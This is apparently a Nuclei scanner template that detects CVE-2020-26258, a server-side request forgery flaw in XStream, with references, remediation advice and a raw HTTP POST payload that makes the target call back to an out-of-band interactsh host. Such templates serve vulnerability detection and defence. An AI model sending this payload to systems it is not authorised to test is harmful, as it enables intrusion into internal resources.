id: CVE-2020-26258 info: name: XStream <1.4.15 - Server-Side Request Forgery author: pwnhxl severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://x-stream.github.io/CVE-2020-26258.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258 - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28 - https://nvd.nist.gov/vuln/detail/CVE-2020-26258 remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 tags: cve,cve2020,xstream,ssrf,oast metadata: max-request: 1 http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 0 http://{{interactsh-url}}/internal/: 0 test matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # Enhanced by md on 2023/04/12